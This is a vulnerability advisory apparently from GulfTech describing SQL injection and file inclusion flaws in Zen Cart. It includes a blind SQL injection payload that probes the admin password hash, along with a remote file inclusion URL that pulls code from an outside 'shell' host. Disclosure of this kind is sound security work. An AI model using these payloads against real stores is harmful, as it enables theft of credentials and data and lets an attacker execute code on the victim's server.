|
Zen Cart Multiple Vulnerabilities
|
August 15, 2021
|
|
|
Description:
Zen Cart is a descendant of the popular osCommerce project, and like
osCommerce Zen Cart is one of the most popular open source ecommerce
systems in the world. Unfortunately Zen Cart is vulnerable to quite
a number of different attacks, and in some circumstances may allow an
attacker to execute arbitrary code on the underlying web server with
the rights of the httpd process. In addition to remote code execution
several different SQL Injection attacks may be possible. The Zen Cart
developers have commited fixes for these issues to CVS and an updated
version of Zen Cart will be released soon to address the issues. All
users should upgrade their Zen Cart installation as soon as possible.
SQL injection:
There are a number of SQL Injection issues in Zen Cart that allows
for an attacker to access and modify data that is stored in the
underlying database. The first of these issues occurs when sending
a malformed post request to ipn_main_handler.php script. The root
of the problem is that some unsanitized GPC data is sent directly
to the ipn_get_stored_session function where it is then used in a
query. Also, since all of $_SESSION is recreated from the results
of this query it is also possible to do stuff like include arbitrary
files by union selecting attacker supplied data to overwrite certain
elements of the $_SESSION array. Another vulnerable function within
Zen Cart is the whos_online_session_recreate function. An attacker
could use this issue to send arbitrary sql data to an update statement
and in newer mysql versions possibly subselect data. The issue that
I just described can be triggered by sending a request to the login
page with a malformed session id within the cookie. Once the attacker
successfully logs in the old session id taken from the cookie will
then be passed to the vulnerable function thus allowing for an attacker
to inject arbitrary sql data. An attacker can also perform SQL Injection
attacks by specifying sql data in the quantity field while updating their
shopping cart, once logged in. The vulnerability here lies specifically
in the add_cart function. In regards to the shopping cart it is also
possible to perform SQL Injection attacks when adding items with
malformed attributes (specifically the id[] parameter) and also
when entering a malformed redemption code when checking out.
-99' UNION SELECT IF(MID(admin_pass,1,1)='2',1,0),2 FROM admin WHERE 1/*
Above is an example of data that could be sent via the id[] parameter
when adding items to the shopping cart. If the first character of the
admin password hash is 2 then an sql error will NOT be shown.
Remote File Inclusion:
Zen Cart suffers from a few file inclusion vulnerabilities that may
lead to the execution of arbitrary code. Fortunately most of these
issues are only exploitable locally due to the difficulty of getting
null bytes through Zen Carts sanitization functions. For example, an
attacker is able to include arbitrary local files by specifying an
arbitrary path to the "typefilter" parameter as traversal sequences
are never filtered out. However, below is a much more dangerous instance
of remote file inclusion in Zen Cart.
/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig;[999][0][loadFile]=http://shell
The above example is possible due to an uninitialized array being
passed to autoload_func.php The issue as shown above does require
register globals to be on, and allows for remote code execution
when register globals are turned on.
Solution:
The Zen Cart developers have commited fixes for these issues to CVS and an updated
version of Zen Cart will be released soon to address the issues. All
users should upgrade their Zen Cart installation as soon as possible.
Credits:
James Bercegay of the GulfTech Security Research Team
|
|
|
